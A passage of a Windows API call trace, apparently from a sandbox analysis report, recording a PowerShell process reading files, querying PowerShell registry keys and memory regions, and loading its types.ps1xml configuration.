lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.261] GetLastError () returned 0x0 [0052.261] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.261] GetLastError () returned 0x0 [0052.262] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, 
nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.262] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, 
lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.263] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.263] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 
[0052.264] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.264] GetLastError () returned 0x0 [0052.268] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.268] GetLastError () returned 0x0 [0052.268] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.268] GetLastError () returned 0x0 [0052.268] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.268] GetLastError () returned 0x0 [0052.268] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.268] GetLastError () returned 0x0 [0052.269] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, 
lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1000, lpOverlapped=0x0) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x1b4, lpOverlapped=0x0) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] ReadFile (in: hFile=0x32c, lpBuffer=0x20618a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14eae4, lpOverlapped=0x0 | out: lpBuffer=0x20618a0*, lpNumberOfBytesRead=0x14eae4*=0x0, lpOverlapped=0x0) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] CloseHandle (hObject=0x32c) returned 1 [0052.269] GetLastError () returned 0x0 [0052.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e644, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0052.269] GetLastError () returned 0x0 [0052.269] SetErrorMode (uMode=0x1) returned 0x1 [0052.269] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2082130 | out: lpFileInformation=0x2082130*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) 
returned 1 [0052.270] GetLastError () returned 0x0 [0052.270] SetErrorMode (uMode=0x1) returned 0x1 [0052.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0052.270] GetLastError () returned 0x0 [0052.270] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea68 | out: phkResult=0x14ea68*=0x32c) returned 0x0 [0052.270] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14eab0, lpData=0x0, lpcbData=0x14eaac*=0x0 | out: lpType=0x14eab0*=0x1, lpData=0x0, lpcbData=0x14eaac*=0x56) returned 0x0 [0052.270] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14eab0, lpData=0x3175c0, lpcbData=0x14eaac*=0x56 | out: lpType=0x14eab0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14eaac*=0x56) returned 0x0 [0052.270] RegCloseKey (hKey=0x32c) returned 0x0 [0052.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0052.270] GetLastError () returned 0x0 [0052.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0052.270] GetLastError () returned 0x0 [0052.476] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, 
State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.498] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.500] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.500] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.500] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.501] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.502] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.504] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.513] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, 
AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.513] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.513] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.513] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.514] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.514] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.514] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.514] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.520] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, 
AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.524] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.525] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.525] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.526] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.526] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.527] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.527] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.527] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: 
lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.528] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.528] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.528] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.529] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.529] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.531] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.533] VirtualQuery (in: lpAddress=0x14d9a8, lpBuffer=0x14e9a8, dwLength=0x1c | out: lpBuffer=0x14e9a8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.534] VirtualQuery (in: lpAddress=0x14d9a8, 
lpBuffer=0x14e9a8, dwLength=0x1c | out: lpBuffer=0x14e9a8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.534] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.535] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.602] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.602] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.603] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.603] GetLastError () returned 0xcb [0052.612] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.614] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: 
lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.614] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.614] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.614] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.614] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.615] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.615] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.616] VirtualQuery (in: lpAddress=0x14d9a4, lpBuffer=0x14e9a4, dwLength=0x1c | out: lpBuffer=0x14e9a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.616] RegOpenKeyExW (in: hKey=0x80000002, 
lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14eb2c | out: phkResult=0x14eb2c*=0x328) returned 0x0 [0052.616] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x14eb94, lpData=0x0, lpcbData=0x14eb90*=0x0 | out: lpType=0x14eb94*=0x1, lpData=0x0, lpcbData=0x14eb90*=0x74) returned 0x0 [0052.616] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x14eb74, lpData=0x0, lpcbData=0x14eb70*=0x0 | out: lpType=0x14eb74*=0x1, lpData=0x0, lpcbData=0x14eb70*=0x74) returned 0x0 [0052.617] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x14eb74, lpData=0x3175c0, lpcbData=0x14eb70*=0x74 | out: lpType=0x14eb74*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14eb70*=0x74) returned 0x0 [0052.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0052.617] GetLastError () returned 0xcb [0052.617] SetErrorMode (uMode=0x1) returned 0x1 [0052.617] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14eb74 | out: lpFileInformation=0x14eb74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xbb369540, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xbb369540, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0052.617] GetLastError () returned 0xcb [0052.617] SetErrorMode (uMode=0x1) returned 0x1 [0052.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", 
